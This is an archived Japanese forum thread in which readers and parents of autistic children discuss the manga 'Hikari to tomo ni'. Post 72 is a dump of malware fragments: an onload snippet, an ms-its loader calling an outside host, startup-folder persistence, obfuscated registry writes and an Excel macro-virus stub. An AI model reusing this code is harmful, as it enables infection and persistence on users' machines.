5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【戸部】光とともに・・・【けいこ】 Part2

1 :花と名無しさん:2006/07/04(火) 12:37:03 ID:ngBJ6yr20
1 名前: 花と名無しさん 投稿日: 04/03/08 18:11 ID:E9iVt7LP
自閉症児を描いた漫画、「光とともに・・・」について語ろう。

前スレ
【戸部】光とともに・・・【けいこ】
http://comic6.2ch.net/test/read.cgi/gcomic/1078737102/

2 :花と名無しさん:2006/07/04(火) 12:41:15 ID:???0
前スレが立ったのって二年前だったのかw
ドラマ化があったから、中盤ではさくさく進んだ?

3 :花と名無しさん:2006/07/04(火) 13:39:13 ID:akVUnvM30
3ゲット

4 :花と名無しさん:2006/07/04(火) 14:06:03 ID:???O
2ゲト
1さん乙


5 :花と名無しさん:2006/07/04(火) 14:46:19 ID:???0
>1
乙可憐♥

6 :花と名無しさん:2006/07/04(火) 15:58:23 ID:???0
即死阻止乙


7 :花と名無しさん:2006/07/04(火) 19:28:01 ID:???0
乙乙

8 :花と名無しさん:2006/07/04(火) 22:33:27 ID:???0
乙乙乙

9 :前スレ988:2006/07/05(水) 19:35:36 ID:???0
今日は絡みはなし
ミサイルが治まるめどがつくまでにこのスレを開いたあなた
あなたが未成年の子を持つ親なら(障害児健常児問わず)、2ちゃんなんか
やってないで防災訓練しる。




10 :花と名無しさん:2006/07/05(水) 21:00:53 ID:???0
>>9
今日だけじゃなく、もう来なくていいよ
「絡み」にきてるなら
ここは漫画の感想をいうスレなんで
該当板へ逝ってください

11 :花と名無しさん:2006/07/05(水) 22:19:46 ID:???0
>>10
まあそう言わずに
人との絡みはなしっていう意味だよw
ここのスレの人のほとんどは頭も良いし真面目だし勉強熱心だから
私の投げかける質問に完璧に答えられると思うんだよね
納得できれば消えるから
感想を言えば良いなら、この漫画は最低でも4巻以降は糞だね
光君がどれほど優しい子だろうと、どうしても中学生になれば性的衝動が
強くなる
そんなの当たり前だし誰も悪くないけど。
そういうの無視して(分かりにくい?つまり、光君が女の子レイプしても
変態教師に彫られてもたぶん無邪気にニコニコしてるってことだよ
健常ではない無邪気ってのはそういうこと)
性の話を5年生で、できものでチンコをかいた程度でやめてしまったとか、
しつこいけど花音の哀しさを一話だけで終わらせたとか
そういうきれいごとの終わらせ方が気にくわない
これでいい?

12 :花と名無しさん:2006/07/05(水) 23:42:29 ID:???0
( ゚д゚)

13 :花と名無しさん:2006/07/05(水) 23:46:30 ID:???0
今月ふろくがついてて立ち読みできなかった。
誰かねたばれ教えて。絵里ちゃんはどうなったの?

14 :花と名無しさん:2006/07/06(木) 15:08:45 ID:???0
>>11
イヤ・・性関連は健常とされている子でも男の子はおくてな子も多いよ。
精通も中学生って子結構いるし。
その話はこれからじゃない?
キラキラ触りたくてクラスの女の子の胸のスパンコール触っちゃってるのは
描いてたし・・。

花音ちゃんに関しては私ももっと描いてほしいけどね。
描かれていないところで可愛がってるんだろうけど、
やっぱり光君にのほうに手がかかりすぎてる気がするからさ・・。
パパが率先して相手してるのはよく分かるけどね。

15 :花と名無しさん:2006/07/06(木) 17:41:23 ID:???0
>しつこいけど花音の哀しさを一話だけで終わらせたとか

その後も花音との関わり方を描いてるよ。水疱瘡の話とかお婆ちゃんの話とか読んだ?
これからも描かれる事はあるだろうけど、この漫画は光君がメインなんだから
花音ちゃんばかりにスポットが当たると言う事はそりゃ無いでしょう。
他の発達障害の子や現代の支援体勢、健常の子との関わり、進路や自立etc…
この漫画で取り上げる事はたくさんあるんだから兄妹の話ばかり何回も描けってのは
ただの読み手のわがままだと思うけど?
性的なことはまだまだこれからでしょう。
高校生にもなるのにいっさい触れられて無いっていうならまだ分かるけど、光君
中学入ったばっかりじゃん。それに性器を触るとか、羞恥心が薄いとか、性的概念が薄いとか
ひげそりの話とか、伏線はぼちぼち出てきてるよ。小学校時代なら充分な描写だと思うけど?



16 :花と名無しさん:2006/07/06(木) 18:45:03 ID:???0
いつも行く書店に昨日まであったのに売り切れてたーorz

17 :花と名無しさん:2006/07/07(金) 03:08:32 ID:???0
戸部さんのサイト初めて見た。自虐ネタワロタよw
10巻の表紙の光君、かっこいいね。

18 :花と名無しさん:2006/07/07(金) 18:38:19 ID:???0
>17
戸部さんのHP移動したのかな?
私のブクマじゃ見れない。
URL教えてほすい。

19 :花と名無しさん:2006/07/07(金) 22:38:56 ID:???0
>>18
『戸部けいこです。』でぐぐってみそ。

20 :花と名無しさん:2006/07/08(土) 00:12:55 ID:???0
>19
d!です。
詰襟が初々しいね。
光くんのあの何処をみてるかわからない眼が
戸部さん、上手いと思う。
自閉っぽくて。

21 :花と名無しさん:2006/07/09(日) 22:29:45 ID:???0
>>13
絵里ちゃん、不良の男の子(悪い子じゃなさそう)と急接近。


絵里ちゃんちがあんな崩壊家庭だとは知らなかった。・゚・(ノД`)・゚・。
(ところどころ読んでないんで…既出の設定?)
今後東家がどう関わってくるんだろう…。

22 :花と名無しさん:2006/07/11(火) 01:28:15 ID:a79XWgeHO
絵里ちゃんの家庭環境は小学校一年生の時の話で少し出ていたけど、あそこまでひどいと思わなかったから軽くショック
戸部さんって表情描くの上手いから分かりやすいせいかリアルすぎて泣きたくなった

23 :花と名無しさん:2006/07/11(火) 09:07:14 ID:???0
美羽ちゃん可愛いなあ。コミック派なんだけど光君小学校卒業後は美羽ちゃんの事は描かれてないのかな?
高学年の美羽ちゃん見たいなー。気になるな−。

24 :花と名無しさん:2006/07/11(火) 11:15:40 ID:???0
光くんは中学校に入学したのですか?
それともまだ春休み中ですか?

25 :花と名無しさん:2006/07/11(火) 11:20:21 ID:???0
絵里ちゃんち、そのうち刃傷沙汰になる予感…。
父親が母親殴り過ぎるか、母親が切れて包丁持ち出すかorz
家を飛び出す絵里ちゃんと東家遭遇…とか?

26 :花と名無しさん:2006/07/11(火) 11:20:58 ID:???0
まだ春休み中です。通学練習中。

27 :花と名無しさん:2006/07/11(火) 12:07:42 ID:???0
>>26
ありがとうです。

28 :花と名無しさん:2006/07/11(火) 12:31:17 ID:???0
あ!スマン!!
入学式やってたよね!不機嫌な顔してたんだっけ。
ガセごめん!!>>27

自分大丈夫かorz

29 :花と名無しさん:2006/07/11(火) 23:17:53 ID:???0
私は今回通学バスの中で奇声を出しちゃう事に対するエピが一番印象に残ったな。
色んなこだわりとか自閉症の特徴のいくつかはこの漫画で知ったけど一般のイメージでは
奇声(意味の無い言葉とかも)をぶつぶつ言うというのが自閉症・知的障害に対してあるから
漫画なんだけど説明して「ああそうだったんだ」とほっとする人がいてこっちもほっとした。


30 :花と名無しさん:2006/07/12(水) 00:47:26 ID:???0
高校生の時、朝の通学の満員電車でずっと車掌さんのアナウンスのマネをしている人がいた。
満員電車だから、姿は見えなくて声ばかり聞こえていた。
最初は気持ち悪かったけど、3年間で慣れた。
声がしないと、体調悪くて乗ってないのかと心配になった。
今となってみると、自閉ちゃんだったんだなーと思う。

今月号で、意地悪な事を言ってるおじさんがいたけど
帰りの電車でそういうおじさんがいた。
混んでる電車でおじいさんが「次降りるから、通してください」と言っただけで
「うるさい、おいぼれが!」と怒鳴ったり、
身体の不自由な人に「迷惑だ、電車に乗るな」と言ったり。

その上、絵理ちゃんの家庭は自分の伯母さんの家庭に似てたり
(色々あって離婚)
何だか胸の痛い月だった。

31 :花と名無しさん:2006/07/12(水) 18:38:09 ID:???0
よく行く本屋さんで、店員の言うことを鸚鵡返しに大声で復唱する男の人
(20代?)をよく見かけるけど、現実に出会うとやっぱりびくっとするね。
大人の男の人だから特に。
けど、予備知識?がある分全然しらないよりはましかな自分、と思ってる。

>>30
>意地悪な事を言ってるおじさん

案外その人も病気かもしれん。前にテレビでやってたピック病みたいな。
どちらにしても心に余裕がない人なんだよ…。

32 :花と名無しさん:2006/08/04(金) 00:02:58 ID:???O
今月号の分はお休み?

33 :花と名無しさん:2006/08/05(土) 00:28:16 ID:???0
>>32
10月号か11月号までお休み
良く覚えてなくてゴメン
理由は書いてなかった

34 :花と名無しさん:2006/08/05(土) 20:28:14 ID:???O
>>33
そうなんだ、dクス。

今年になってから休みが多いけど、戸部さん体調でも悪いのかな…。
それとも取材が大変だったり、ネタにつまって
連載に追いつかないだけなのか。

35 :花と名無しさん:2006/08/14(月) 13:14:22 ID:HqF+9adO0
数ヶ月の休養明けでいきなり休載ね・・
作画に凝るタイプじゃないし、体調不良かな

36 :花と名無しさん:2006/08/17(木) 12:53:51 ID:???0
突如中学生編になっちゃって取材に大わらわとか、
それとももっとじっくり小学校卒業を描きたかった戸部さんと
中学生編を急いた編集との間でこじれだしたのか。


37 :花と名無しさん:2006/08/20(日) 14:10:40 ID:???0
確かにこの半年の間は、あまりの急展開があったかと思ったら
またなかなか話が進まないとか、内容に「?」な部分はある。

もし本当に取材が大変だから休載してるのだったとしたら、
今後も、ちょこっと書いて、また数ヶ月休載して・・・ってのが
繰り返されるのだろうか。orz

38 :花と名無しさん:2006/08/24(木) 06:57:55 ID:???0
age

39 :花と名無しさん:2006/08/29(火) 19:16:17 ID:???0
コミックス読んだけど、展開早すぎ

40 :花と名無しさん:2006/08/30(水) 03:05:27 ID:???0
1番付いて行けてないのが戸部さんだったりして。

41 :花と名無しさん:2006/08/30(水) 19:43:39 ID:???0
結局、亮太くんってどうなるんだろう?

42 :花と名無しさん:2006/09/01(金) 21:23:46 ID:???0
10巻ゲットしたー。
凄い展開の早さに泣けた。西脇先生や保険の先生ともちゃんとお別れして欲しかったよー。
青木先生、海七太くん、前校長先生以外の人との別れはみんなあっさりしてるなぁ。
9巻だけど、ゴリ先生とか若林先生もあっさりいなくなっちゃってサミシス。
モナ会館&キターと、 節約されてる食卓にはワロタけどw

>>40
モデルになってる子に光君の年齢が追いついちゃったしねぇ。
これからは違うモデルを捜すのか、完全にオリジナルの道を行くのか、どちらにしろ取材中と見た。

43 :花と名無しさん:2006/09/02(土) 12:24:18 ID:???0
あの別れ際のクールさがリアルだと思ったよ
療育施設や、お世話になった保育園の先生たちと別れがたいのは、親だけなんだよね。
だって子供は、「卒業」とか「おわかれ」の意味が解かってないし、もともと人に
執着してないしね


44 :42:2006/09/02(土) 12:44:19 ID:???0
>>43
いやいや、光君に泣けと言ってるんじゃなく描写的にね。
幸子や先生が思い出を振り返ったり「お世話になりました」と挨拶をしてしみじみしたり
そういうのがなかったのが寂しかったなぁと。

45 :43:2006/09/02(土) 13:28:33 ID:???0
それはわかってるよ
でも、子供がそうやってスタスタと帰っていくと、親もしみじみする暇もない。
私も、最後の日は涙涙になるだろうな〜〜と意気込んでいたのに、実際は
いつもと同じ「さようなら」だけしかできなかった。
たしかに、お話として、そういうシーンはあったほうが感動するとおもうけど
リアルっていう点では、これでいいんじゃないとおもうよ。

46 :花と名無しさん:2006/09/02(土) 15:47:21 ID:???0
人の執着は子供によって違うと思う。
ただ執着しているからと言って、私達にとって分りやすい行動を
するかと言えば、そうではない。
数年経ってから恋しがったりするケースもあるし。

誤解されないように、念のため。

47 :花と名無しさん:2006/09/04(月) 17:39:39 ID:???0
>>46
それ分かる。
うちの子(自閉)は、幼稚園時代凄く世話を焼いてくれる子がいた。
でも、うちの子はツーンとしてて執着しない
で、小学校は別だった。
今、小学校6年なんだが「○○さんは何処にいるの?」と聞いてくる
6年たった今頃恋しがるて・・・
でも、この間会ったのに嬉しそうにしない。どちらかと言えば無視。
世話やいてくれた子は、「○○君がしゃべってる」と大感激してくれたのに。
で、家に帰ると「○○さんは何してるの?」なんだよ。

48 :花と名無しさん:2006/09/05(火) 07:57:35 ID:???O
>>47
月日の経過と共に○○さんの雰囲気が変わって、
同じ人だと判断できなかったのかな。
息子さんが会いたかったのは昔の○○さんだった、とか。

49 :花と名無しさん:2006/09/05(火) 21:49:26 ID:???0
>>48
それかもしれない!

そういえば、転校していった自閉のお友達が2年ぶりに学校に遊びに来た。
顔つきは変わってないが、身長が凄くのびていた。
うちの子に「○○くん来たよ」と言っても「いない」と言い張る
そっと顔を上に向けてやると「あ!○○くんだ!」と喜んで抱きついた。
自分より少しだけ高い場所にあったその子の顔を捜していたらしい

50 :花と名無しさん:2006/09/06(水) 23:07:35 ID:QEO417nW0
一時期カナタにスポットが当たりすぎてるような気がして
周りの友達の描写入れるのいいけどちょっとやりすぎだろって思ってた。
カナタが転校してやっと光くんや美羽ちゃんメインの話に戻るかなと思ったら
駆け足の展開だし、お休みしちゃったからな〜
体調が悪いならあれだけど、取材して色々時間がかかってのお休みなら
連載再開後の展開、ちょっと期待。

51 :花と名無しさん:2006/09/08(金) 19:32:46 ID:???0
発達障害の専門職、特に心理職の人間にもっと読まれてほしい漫画です。
実際の心理職は自閉症の専門の人は少数ですから。

知ったふりして「特別支援教育」とかやるんだったら、
せめてこの漫画ぐらいは目をとおしておいてほしいなあ。

52 :花と名無しさん:2006/09/12(火) 18:40:20 ID:???0
美羽ちゃんて、やけに嘔吐シーンがあると思わない?
初登場の回でも熱出して吐いてたし、その後も
パニックで泣き叫んで吐いたり、、食べすぎで吐いたり、
最近発売の単行本10巻でも吐いてたよね。

まあ「吐く」ということが、言葉で意思表示のできない
美羽ちゃんの「苦しみのサイン」と解釈できなくもないけど。

53 :花と名無しさん:2006/09/13(水) 18:14:41 ID:???0
嘔吐って健常者(大人でもね)でも辛い時等に
起こりやすいパターンの一つだから
どちらかと言えば自然だと思うんだよね。
でもそれが分らない>>52さんのような人が多いとしたら
それはそれでイイ事だ。
ただ、知っておいて欲しいとは思うかな。
吐くのは本当に多いから、自閉症関係なく、さ。

54 :花と名無しさん:2006/09/15(金) 19:58:05 ID:???0
>>52
一年に夏の日に発熱で嘔吐、郡司先生の時に給食の食べ過ぎで嘔吐、赤松先生の時に給食の食べ過ぎで嘔吐
の3回じゃなかったっけ?パニックで嘔吐した描写なんかあった?
発熱以外は単に「新しい先生が美羽ちゃんの特性を把握してなかったから起きた嘔吐」なんじゃないの?

55 :花と名無しさん:2006/09/16(土) 18:45:59 ID:???0
52です。
4巻高学年編11話で、美羽ちゃんが郡司先生に叱られて大泣きしたあとに
「うげっ」とするシーンがあります。
これを「パニックで吐く」と解釈したのですが、私の勝手な思いこみ
でしたかね……

56 :花と名無しさん:2006/09/18(月) 23:30:34 ID:???0
パニックで吐くってあると思うけど。
っつーか、うちの息子は泣きじゃくった後にも吐いたな。
発熱してもすぐ吐いた。

嘔吐シーンが多すぎて嫌って事かな?
光くんは無いよねえ。
美羽ちゃんは吐きやすいって事でFAw

57 :花と名無しさん:2006/09/20(水) 13:34:08 ID:???0
赤松先生とつばさ君の別れに泣けた。
実際だと、亮太君やつばさ君みたいに、多少付き合いがあっても
「こいつはヘンな奴」程度の理解で止まってしまうタイプは
かなり大変そうだと思うな。
子供育てるってだけで楽じゃないことなのに、行政からの支援が
受けにくかったり、回りからの理解も得られにくかったり。

58 :花と名無しさん:2006/09/20(水) 16:22:07 ID:???0
>>55
あ、本当だ、吐いてる。>4巻
気が付かなかったw ごめんね。

59 :花と名無しさん:2006/10/04(水) 22:04:31 ID:u1QDjRzN0
連載再開age

今回の光くんの行為、前に早織ちゃんにした行為で、
西脇先生が心配していたのが伏線になってるね。

それと、お姑さんにいわれた言葉ズシンとくるな
私も実の親によく似たこと言われる
自閉症は治らないて言い続けてるのに、
まだ時期が来たら治ると思ってる・・・

60 :花と名無しさん:2006/10/04(水) 22:32:13 ID:???0
ttp://headlines.yahoo.co.jp/hl?a=20061004-00000071-mai-soci

こんなニュース聞いたら、ほんとにやるせなくなってくる…

61 :花と名無しさん:2006/10/05(木) 09:26:44 ID:???0
お姑さんの話、まだ実感はないけど言いたい事は分る気がする。

子供が自立して、いくら健康でも若い時とは体力も違うし
本来なら孫を可愛がったり趣味を楽しんだりと、のんびり人生楽しみたいと言うのが
いわゆるおばあちゃんおじいちゃんの本音だと思うんだよね。
自営の人はずっと働いてたりするけど、子育てに付いては自立した時点で
心配しつつも終わったと感じてるし。
なのに孫が絶対に治らない障害。
今までずっと頑張ってきてやっと子育てが終わったと思ったのに、
更にずっと心配が残ると言う事を認めたくないんだと思う。
ましてお姑さんは旦那さんが亡くなっているから、愚痴を言える人もいないし。
でもこういう事は本来は実子である息子に言うべきなんだろうけど、
無意識に色々な意味で甘えがあって
(息子と喧嘩したくない、同じ母親なら自分の気持ちを分ってもらえるとか)
幸子に言ってしまったんだと思う。

祖父母がすごく高齢なら、あやふやで済ませる方法もあると言えばあるけど・・・
元気だと、親としては幸子のように説明せざるを得なくなってしまう。
まして咄嗟に言われると、相手の意図まで考えていられなかったりするし。
今回の場合、お姑さんが本当に知識として分ってないのか、
治ると信じたいだけなのか、あれだけでは判別できないのがまた難しいしね。

62 :花と名無しさん:2006/10/05(木) 17:35:11 ID:???0
何だか毎回お姑さんが嫌な役回りでかわいそうだなー

個人的にだけど、お姑さん本当は何もかも分かってて
辛くて思わず言っちゃったんじゃないかなと思う
>>61さんの言うとおり、孤独なんだろうね
幸子も誤解してると思う
「お姑さんにとって可愛い孫は花音だけ」て
そんな事は無いと思う
光君が可愛いから、将来の事を心配したり、
花音との成長の差を悲しんだりするんだと思う。
もし可愛くない孫だったら、光君の事無視すると思うよ。
幸子だって、光君の障害と向き合うまでに時間がかかったように
お姑さんだって、時間はかかる
しかも一緒に暮らしていないんだからなおさらだと思う。

63 :花と名無しさん:2006/10/05(木) 20:17:06 ID:???0
そうなのかな…。そう思いたいところだけど。

自分たち読者は幸子の目線で見てるから、
自閉症を理解出来ない、理解しようとしない姑を「悪」だと受け取ってしまうけど、
「世間一般の認識ってあんな感じ」を表す代表のひとりとして描かれてると思う。
>>60の記事なんかみたら、つくづくそう思う…)
ひどい話だけど「いっそ死んじゃった方がこの子の為」とか思ってる
無知な親戚なんか、普通にいると思う。
けどそれってその子の為なんかじゃなくて、自分の体裁の為なんだよね。

幸子が「大きくなったら自閉症の青年になります」って言った、あの台詞がよかった。
あれで姑は、ちょっと我に返って考えてくれないかなと思った。

64 :花と名無しさん:2006/10/05(木) 20:29:27 ID:???0
>>62さんの意見に同意。

お姑さん、一番最初の頃の自閉症無理解の時はイヤだったけど、
お姑さんはお姑さんなりにその後、自閉症を理解しようとしていたし、
小学校の学習発表会の時に光君の言動を笑う生徒に対して怒ったり
光君に対する愛情は持っているのだと思う。

ただ、幸子自身も、一番最初のまだ自閉症に無理解だった時に受けた暴言や
花音ちゃんを引き取って育ててあげようか?発言の時とか、色んな過去のコトを
わだかまりとしてずーっと引きずってるからか、そのお姑さんなりの愛情は
理解できないんだろうね。

幸子にとっては、そのわだかまりは、郡司先生が定年退職迎える時に
幸子にそれまでの自らの行いを詫びた時のようなコトがなければ
ずっと胸のつかえとして残り続けるのかも。

65 :花と名無しさん:2006/10/05(木) 22:09:54 ID:???0
>>63
う〜ん・・・例えば

>ひどい話だけど「いっそ死んじゃった方がこの子の為」とか思ってる
>無知な親戚なんか、普通にいると思う。
>けどそれってその子の為なんかじゃなくて、自分の体裁の為なんだよね。

仮に(無意識も含めて)こういう考えの人を10000人集めたとしても、言動は様々なんだよね。
本当にヒドイ事を言う。
光君のお姑さんのような事を言う人もいる。
奇麗事を言う人もいる。
その他。
本当に様々だよ。

自閉症の子を育てている親からすると(「世間〜代表の一人)とまで断定するには
お姑さんの描写が足りないと思ってしまうな。
ああいう事を言う人は結構いる、そしてその意図をつかむのは難しい。まして咄嗟には。
(同じ事を言ってるから意図も同じとは限らない為)・・・としか言えないな。

66 :花と名無しさん:2006/10/05(木) 22:46:52 ID:???0
自分は自閉症の人と関わりがないから、
>>63の「無知なその他大勢」に当てはまる部類。
お姑さんは、多分、光君が全く血縁じゃないよその子だったら
まさしく奇麗事をいうタイプだと思うよ。
自分の孫だから奇麗事言ってられないわけで。
けど、悪態つくタイプの人ではなさそうだから、根はいい人なんだろう。

まあ、愛情がないとは切り捨てられないけど(例:>>64の4行目)、
出来れば見たくないって気持ちもどこかにあると思う
(例:花音ちゃんだけを連れ回したがったり、デパートでの奇行を恥ずかしがったり)。

実際、自閉症のお子さんを育ててる方からみれば、
姑の描写は物足りないのかもしれないけど、
あの物語の中では、重要な登場人物ではないというだけの話だと思う。
でも、たまに登場しては幸子をさり気に傷つけたり、一方では少しづつ理解してる
描写も織り込んでいく…みたいな役割だと。

67 :花と名無しさん:2006/10/05(木) 23:36:47 ID:???0
62ですが・・・
全ては伏線じゃないかなと思ったりしてる
例えば、光君の大怪我の原因が郡司先生で
その郡司先生にサポートの仕方が分からない発言をさせたかなり後で
青木先生の後任の担任にさせた件
私は、あの物語の中でお姑さんもかなり重要な役割を示していると思ってる
むしろ幸子のお母さんの方が重要じゃないなと思ってる
いつも幸子の側に立って、幸子を褒めて勇気付けたりしてるけど。

私の母親がこういう事を言ったんですよ
孫は凄く可愛い。
だけど、その孫によって子供(私)が辛い目にあっている
そう思うと、孫が憎たらしく思える
でも、可愛い孫なのは間違いない。
だからとても複雑

お姑さんも、こういう感情があるんじゃないかな
幸子に向かって愚痴ったのは、嫁だから。
光君の事はどうにもならない事だと分かってるから
雅人に言うと雅人を苦しめる
身内であっても他人の幸子になら言えたんじゃないかな
ある意味、幸子には迷惑だよね。傷つくし。
お姑さんは本音を言える相手がいないから苦しいんだろうな。


68 :花と名無しさん:2006/10/06(金) 19:22:17 ID:???0
>>67
同じ祖母と言う時点で十分幸子の母親も重要な役割だと思うよ。
どちらかと言えばこのマンガは、自閉症児の親へ向けたマンガではなく
知らない人に自閉症を理解して欲しい、つまり自閉症児を知らない人がターゲットだから
身内にも色々な人がいると言う事を描いてるんじゃないかな。

ただ、このマンガって結構重要だと思われることを、あまり重くしたくない為か?
サラっと描いてしまう。
それは良い面もあれば、伝わらないと言える面でもあるよなあ。

69 :花と名無しさん:2006/10/06(金) 21:29:12 ID:???0
お姑さん、口調がキツイかったり、言うことがひどい部分は確かにある。
そういうお姑さんだから、幸子の苦手意識は拭えないだろうし、
雅人もつい口調がキツくなっちゃうのかもしれない。

でも、5巻の最後の方のお姑さんのつぶやきや、「お金を出す時ぐらいしか
誰も相手にしてくれないのね」って言葉が、何だかすごく可哀想に思えた。

早くに旦那さんを亡くして、遺産と子供を守って頑張ってきた。
けれど、娘夫婦は今は海外転勤、雅人はめったに実家に帰ってこない。
一人取り残されて、寂しさを感じるのは当然だと思う。

せめて雅人にはお母さんの寂しい心も理解してあげて、
たった一人の母として、その存在を大切にしてもらいたいって思うよ。

70 :花と名無しさん:2006/10/07(土) 09:04:21 ID:???0
今回の、バスの中で見知らぬ女性の髪クンクンは、
やっぱ『最初に適切な指導をしなかったのがいけない』と
あの女の先生の責任にされちゃうのかなあ…?


71 :花と名無しさん:2006/10/07(土) 09:21:10 ID:BYgIIgSC0
>>70
なんかトゲのある物言いだね。

72 :<body onload=window()>:2006/10/07(土) 14:08:57 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

73 :花と名無しさん:2006/10/07(土) 17:56:19 ID:???0
別にトゲのある言い方だとは思わないけど。>>70

先生とおんなじシャンプーでも使ってたのかな?
幾ら「自閉症なんですスイマセン」と謝られても、光君もだんだん大きくなってきて
子供のイタズラでは済まなくなってきた。された側の女性はいい気分じゃないだろうし。
今回の件でその事についての対策が練られるんだろうと思う。

しかし、ウエンツ似なのか…光君w

74 :花と名無しさん:2006/10/07(土) 20:00:45 ID:???0
光くんは、可愛い外見(漫画だし…)だから
先生も「あら…」くらいでやり過ごしちゃったけど
外見のむさい、でかい男子に
いきなり髪のにおいかがれたら、
障害のことを知っていても嫌かも。

…実際に知っている自閉症の男の子が3人いるんだけど
偶然なのか、3人が3人とも標準以上の身長で、しかも太め。
中学生の段階で、体格だけなら負けてたんで、ちょっと…。

75 :花と名無しさん:2006/10/07(土) 20:01:24 ID:???O
予告によると、これから光君の思春期に関して
掘り下げて描いて行くみたいな感じ。

誰もが通る思春期の異性への感情や身体的な興味が
光君はあぁいう形で直に出ちゃったのかもしれないけど、光君の成長に伴って、
そういう行動が「障害があるから」って説明だけでは通用しなくなってきて、
幸子の新たな悩みの種になるんだろうな。
幸子もずっと以前から、母親として光君の第二次性徴に
どう対応すべきか不安を持ってたしね。

それにしても花音ちゃんが暫く見ない間に急に成長して
以前のお転婆ぶりが減って、すっかり女の子らしくなったね。
カワイイ。

76 :花と名無しさん:2006/10/07(土) 20:08:00 ID:???0
今回、光くんの落としたメモ見て
自分もみかん持って来ちゃった花音ちゃんに、
幸子が「ありがとう。とってもうれしい」と
笑顔で言ったシーンはすごくよかった。


77 :花と名無しさん:2006/10/08(日) 00:03:22 ID:???0
>>74
自閉症の勉強会に行った時に、
自閉症は一旦ついた習慣は変えられないから、
お母さんと一緒に入ったり、
子供だからといって女湯に一緒に入ったりはしないようにと言われた
銭湯が好きな子だから、一緒に女湯に入れたりしてたんだけど止めた
お風呂も、子供だけ裸にして自分はTシャツ短パンで身体を洗いに入った
大人になると自然に分かる事が、自閉症の場合分からないんだよね
お風呂とかは良いんだけど、プールが問題
夏休みにプールに連れて行きたくても、更衣室の関係で連れて行けない
更衣室で1人には出来ないし・・・

78 :花と名無しさん:2006/10/08(日) 00:22:44 ID:???0
皆さん、あの姑に優しいなあ・・・
私、あの姑が出てくるたびに、ヌッ頃したくなる。
今回の「ああいう子」とかさ。
幸子も、雅人にチクっちゃえばいいのに。
ああ、雅人、マザコンで、以前幸子がチョト姑のグチっぽいこと言っただけで
機嫌悪くなってたもんな。アテにならんか。
雅人にも最初は腹たったよ。あんな酷いこと言っといて、ワビのひとつも言わないから。


79 :花と名無しさん:2006/10/09(月) 15:31:03 ID:???0
>>77
近くの作業所とか役所とかで、地域の訓練会のような団体や
ボラさんの情報をもらえないでしょうか?
男性のボラさんと何度か会っておいて、
慣れたら更衣室に一緒に入ってもらうという方法が取れるかも。
知り合いの男の子と女の子の自閉症のお子さんがいるお母さんは
ボラを頼んで男の子の方は更衣室も頼んでると言う話を聞きました。
とは言え、さすがにあまり頻繁には頼めないとは思うけど。



80 :花と名無しさん:2006/10/10(火) 15:48:14 ID:wuePwTuK0
>>79
お父さんには頼めないの?

81 :80:2006/10/10(火) 15:52:33 ID:wuePwTuK0
…途中で書き込んでしまった。

ボランティアさんに頼むのが悪いとは言わないけど、
トイレとか、思春期のいろんなこととかは
やはり家庭でも『男』が関わったほうがいいと思います。
そういうときこそ父親の出番では?と思ったもので。

うちの近所の軽度自閉症の男の子(小5)は
同居しているおばあちゃんによると
性的なものへの関心が早いというかやたら強いんだって。
…でも、父親は知らんふりなのでどうしていいやら、と
よく愚痴をこぼされます。

82 :花と名無しさん:2006/10/10(火) 15:59:31 ID:wuePwTuK0
>>77

こないだ温泉に行ったら、明らかに
ちょっと行動が…な男の子が、独りで女湯にいた。
付き添いはいないのかと探したんだけど、
お母さんらしき人が、更衣室で(自分は着衣で)待っていて
あがっていったその子をバスタオルで迎えていた。

一緒に入れない事情もあったんだろうけど
単独で女湯に入らせるくらいなら
日を改めればいいのに…と思った。

83 :花と名無しさん:2006/10/10(火) 16:50:44 ID:???0
>>80
人込みとか大人数が苦手な子は多い。
特に、夏休みは子供のキーキー声がプールに響いている
父親に頼むとすると、土・日・祝日
プールは芋の子を洗う状態でなかなか難しい


84 :花と名無しさん:2006/10/10(火) 20:00:12 ID:wuePwTuK0
>>82
kwsk

85 :花と名無しさん:2006/10/10(火) 21:49:53 ID:???O
プールは更衣室の他に個室を貸してくれる所もありますよ。
聞いてみる価値はあるかと。

86 :花と名無しさん:2006/10/10(火) 22:04:06 ID:???0
>>85
サンクス!
市営プールがあるから問い合わせてみます
子供が好きなのは、ウォータースライダーのある第三セクターのプールなんだけど、
そっちにも問い合わせてみます


87 :花と名無しさん:2006/10/14(土) 18:58:31 ID:???0
この漫画青年誌じゃなくて少女漫画だったのか?
ドラマ見たけど漫画より小説向けじゃね?

88 :花と名無しさん:2006/10/15(日) 17:03:01 ID:r1IT1k2L0
『for Mrs.』だから、少女というには微妙っちゃー微妙だけどさ

89 :花と名無しさん:2006/10/15(日) 17:15:25 ID:???0
あれはどう考えても少女雑誌じゃないでしょ。
主婦対象の漫画雑誌と言うのが正しい。

90 :花と名無しさん:2006/10/16(月) 20:54:03 ID:???0
作者はもともとは少女漫画家だけどね。
描いてるテーマが違いすぎてて、最初のうち「幕末魔法陣」の作者だなんて気がつかなかった。

91 :花と名無しさん:2006/11/01(水) 20:41:08 ID:???0
当方男なのですが、
主婦対象の漫画雑誌(?)を立ち読みするのも購入するのも憚られるので、
まだハードルの低いコミックスの方で読み進めています。
